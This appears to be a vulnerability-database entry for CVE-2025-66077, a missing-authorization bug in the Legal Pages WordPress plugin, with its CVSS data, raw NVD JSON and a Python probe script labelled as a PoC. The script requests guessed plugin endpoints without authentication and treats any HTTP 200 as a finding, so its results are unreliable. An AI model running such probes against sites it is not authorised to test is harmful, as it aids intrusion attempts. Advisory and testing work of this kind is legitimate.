Security Vulnerability Report
中文
CVE-2025-66077 CVSS 5.3 MEDIUM

CVE-2025-66077

Published: 2025-11-21 13:15:49
Last Modified: 2026-04-27 18:16:34

Description

Missing Authorization vulnerability in wpWax Legal Pages legal-pages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Legal Pages: from n/a through <= 1.4.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

wpWax Legal Pages <= 1.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66077 PoC - WordPress Legal Pages Broken Access Control # Target: WordPress site with Legal Pages plugin <= 1.4.6 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-66077 """ # Common endpoint patterns for Legal Pages plugin endpoints = [ '/wp-json/legal-pages/v1/', '/wp-admin/admin-ajax.php?action=legal_pages', '/wp-content/plugins/legal-pages/' ] print(f"[*] Scanning target: {target_url}") print(f"[*] Vulnerability: Missing Authorization in Legal Pages") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request to check access response = requests.get(url, timeout=10, verify=False) # Check if we can access protected resources without authentication if response.status_code == 200: print(f"[+] Potential vulnerability found at: {url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.content)} bytes") return True else: print(f"[-] Endpoint {endpoint} returned: {response.status_code}") except requests.RequestException as e: print(f"[!] Error accessing {url}: {str(e)}") print("[*] No obvious vulnerability indicators found") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-66077_poc.py <target_url>") print("Example: python cve-2025-66077_poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66077", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:48.680", "lastModified": "2026-04-27T18:16:33.793", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wpWax Legal Pages legal-pages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Legal Pages: from n/a through <= 1.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/legal-pages/vulnerability/wordpress-legal-pages-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}